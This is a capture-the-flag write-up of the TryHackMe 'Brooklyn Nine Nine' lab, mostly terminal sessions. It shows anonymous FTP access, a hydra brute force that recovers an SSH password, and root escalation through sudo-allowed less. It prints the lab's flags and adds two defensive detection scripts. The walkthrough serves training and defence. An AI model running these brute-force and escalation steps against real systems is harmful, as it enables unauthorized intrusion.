【Tryhackme】Brooklyn Nine Nine(ft


Author: 天线锅仔 | Published 2021-09-25 01:33

    Service discovery

    ┌──(root💀kali)-[~/tryhackme]
    └─# nmap -sV -Pn 10.10.60.116                      
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 05:20 EDT
    Nmap scan report for 10.10.60.116
    Host is up (0.34s latency).
    Not shown: 997 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds
    
    

    Anonymous login to the FTP service

    ┌──(root💀kali)-[~/tryhackme/brooklyn]
    └─# ftp 10.10.60.116   
    Connected to 10.10.60.116.
    220 (vsFTPd 3.0.3)
    Name (10.10.60.116:root): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
    226 Directory send OK.
    ftp> get note_to_jake.txt
    local: note_to_jake.txt remote: note_to_jake.txt
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
    226 Transfer complete.
    119 bytes received in 0.06 secs (1.9443 kB/s)
    

    This downloads a file named note_to_jake.txt

    View the file

    ┌──(root💀kali)-[~/tryhackme/brooklyn]
    └─# cat note_to_jake.txt 
    From Amy,
    
    Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
    

    That is practically an invitation to crack his SSH password, so crack it with hydra

    ┌──(root💀kali)-[~/tryhackme/brooklyn]
    └─# hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.60.116 ssh -t 20 -v                                                                                                                                                       130 ⨯
    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-24 05:26:34
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
    [DATA] max 20 tasks per 1 server, overall 20 tasks, 14344399 login tries (l:1/p:14344399), ~717220 tries per task
    [DATA] attacking ssh://10.10.60.116:22/
    [VERBOSE] Resolving addresses ... [VERBOSE] resolving done
    [INFO] Testing if password authentication is supported by ssh://jake@10.10.60.116:22
    [INFO] Successful, password authentication is supported by ssh://10.10.60.116:22
    [ERROR] could not connect to target port 22: Socket error: Connection reset by peer
    [ERROR] could not connect to target port 22: Socket error: Connection reset by peer
    [ERROR] ssh protocol error
    [ERROR] ssh protocol error
    [ERROR] could not connect to target port 22: Socket error: Connection reset by peer
    [ERROR] ssh protocol error
    [ERROR] could not connect to target port 22: Socket error: Connection reset by peer
    [ERROR] ssh protocol error
    [22][ssh] host: 10.10.60.116   login: jake   password: 987654321
    [STATUS] attack finished for 10.10.60.116 (waiting for children to complete tests)
    

    Password recovered: jake:987654321
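
A defender's view of the hydra run above, as an added example that is not part of the original write-up: a small Python check that scans sshd log lines for a burst of failed password attempts followed by an accepted login from the same source for the same user. The log lines are constructed, and the threshold, window and year values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log lines in OpenSSH's syslog format; host name, PIDs,
# times and source addresses are invented for this example.
SAMPLE_LOG = """\
Sep 24 09:26:36 nine-nine sshd[2101]: Failed password for jake from 10.9.0.5 port 40110 ssh2
Sep 24 09:26:37 nine-nine sshd[2102]: Failed password for jake from 10.9.0.5 port 40112 ssh2
Sep 24 09:26:39 nine-nine sshd[2103]: Failed password for jake from 10.9.0.5 port 40114 ssh2
Sep 24 09:26:40 nine-nine sshd[2104]: Failed password for jake from 10.9.0.5 port 40116 ssh2
Sep 24 09:26:42 nine-nine sshd[2105]: Failed password for jake from 10.9.0.5 port 40118 ssh2
Sep 24 09:26:44 nine-nine sshd[2106]: Accepted password for jake from 10.9.0.5 port 40120 ssh2
Sep 24 09:40:02 nine-nine sshd[2190]: Failed password for amy from 10.9.0.77 port 51500 ssh2
Sep 24 09:40:09 nine-nine sshd[2191]: Accepted password for amy from 10.9.0.77 port 51502 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def find_guessed_logins(log_text, threshold=5, window=timedelta(minutes=10), year=2021):
    """Return (source, user, failures) for every accepted password login that
    follows at least `threshold` failures from the same source within `window`."""
    failures = defaultdict(list)
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # Classic syslog timestamps carry no year, so one is supplied.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["src"], m["user"])
        if m["result"] == "Failed":
            failures[key].append(ts)
            continue
        recent = [t for t in failures[key] if ts - t <= window]
        if len(recent) >= threshold:
            alerts.append((m["src"], m["user"], len(recent)))
        failures[key].clear()  # a successful login resets the counter
    return alerts


if __name__ == "__main__":
    for src, user, count in find_guessed_logins(SAMPLE_LOG):
        print(f"[!] {user}: login from {src} after {count} failed attempts")
```
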

    user.txt is found in the /home/holt directory

    ┌──(root💀kali)-[~/tryhackme/brooklyn]
    └─# ssh jake@10.10.60.116               
    The authenticity of host '10.10.60.116 (10.10.60.116)' can't be established.
    ECDSA key fingerprint is SHA256:Ofp49Dp4VBPb3v/vGM9jYfTRiwpg2v28x1uGhvoJ7K4.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.60.116' (ECDSA) to the list of known hosts.
    jake@10.10.60.116's password: 
    Last login: Tue May 26 08:56:58 2020
    jake@brookly_nine_nine:~$ ls
    jake@brookly_nine_nine:~$ whoami
    jake
    jake@brookly_nine_nine:~$ pwd
    /home/jake
    jake@brookly_nine_nine:~$ cd ..
    jake@brookly_nine_nine:/home$ ls
    amy  holt  jake
    jake@brookly_nine_nine:/home$ cd amy
    jake@brookly_nine_nine:/home/amy$ ls
    jake@brookly_nine_nine:/home/amy$ cd ../holt/
    jake@brookly_nine_nine:/home/holt$ ls
    nano.save  user.txt
    jake@brookly_nine_nine:/home/holt$ cat user.txt
    ee11cbb19052e40b07aac0ca060c23ee
    

    Check sudo privileges with sudo -l; less can be run

    jake@brookly_nine_nine:/home/holt$ sudo -l
    Matching Defaults entries for jake on brookly_nine_nine:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User jake may run the following commands on brookly_nine_nine:
        (ALL) NOPASSWD: /usr/bin/less
    
    

    Privilege escalation to root

    jake@brookly_nine_nine:/home/holt$ sudo less /etc/profile
    # id
    uid=0(root) gid=0(root) groups=0(root)
    # cat /root/root.txt
    -- Creator : Fsociety2006 --
    Congratulations in rooting Brooklyn Nine Nine
    Here is the flag: 63a9f0ea7bb98050796b649e85481845
    
    Enjoy!!
    # 
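
From the defender's side, the `sudo -l` output above can be audited automatically. The following is an added example, not part of the original write-up: it parses that output and flags entries for programs that can start a shell when the sudoers NOEXEC tag is not set. The `SHELL_CAPABLE` list is a short, non-exhaustive assumption, and the function name is hypothetical.

```python
import re
from pathlib import PurePosixPath

# The `sudo -l` output shown on this page, used as input.
SUDO_L = r"""Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less
"""

# Assumption: short, non-exhaustive list of programs that can start a shell.
SHELL_CAPABLE = {"less", "more", "man", "vi", "vim", "find", "awk"}

# Entry layout: "(runas) TAG: TAG: /path/to/cmd args, /other/cmd"
ENTRY = re.compile(
    r"^\s+\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>(?:/|ALL).*)$"
)


def audit_sudo_l(text):
    """Return (runas, command, reasons) for each risky entry in `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # Defaults lines and headers are not command entries
        tags = set(re.findall(r"[A-Z_]+", m["tags"]))
        for cmd in m["cmds"].split(","):
            if not cmd.strip():
                continue
            binary = cmd.split()[0]
            name = PurePosixPath(binary).name
            reasons = []
            if binary == "ALL":
                reasons.append("any command allowed")
            elif name in SHELL_CAPABLE and "NOEXEC" not in tags:
                reasons.append(f"{name} can start a shell and NOEXEC is not set")
            if reasons and "NOPASSWD" in tags:
                reasons.append("no password required")
            if reasons:
                findings.append((m["runas"], binary, reasons))
    return findings


if __name__ == "__main__":
    for runas, binary, reasons in audit_sudo_l(SUDO_L):
        print(f"[!] runas={runas} {binary}: {'; '.join(reasons)}")
```

Where a pager under sudo is genuinely required, a rule carrying the `NOEXEC:` tag is the setting this check looks for.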
    
